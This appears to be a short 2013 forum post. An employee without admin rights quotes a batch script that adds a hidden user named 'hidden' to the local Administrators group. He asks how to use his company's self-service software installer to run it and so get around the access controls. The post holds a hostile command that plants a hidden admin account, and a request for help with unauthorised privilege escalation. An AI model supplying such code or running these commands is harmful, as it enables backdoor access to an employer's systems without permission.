Christopher
2013-10-05 08:22:50 UTC
"@echo off
net user hidden passwordhere /add
net localgroup Administrators hidden /add"
Unfortunately, since I am not an administrator, I do not have the permissions to perform this task. Neither do I have the permissions to install a program, but I have noticed that there is one place where I can. It is a webpage that my company hosts that allows you to download and install certain programs that us employees might need for work. I opened up the program in Notepad and I found the following permissions:
"
"
I am not familiar enough with code to write a program with these permissions that allow me to make a new account. Is that possible, and if so, what would the code be?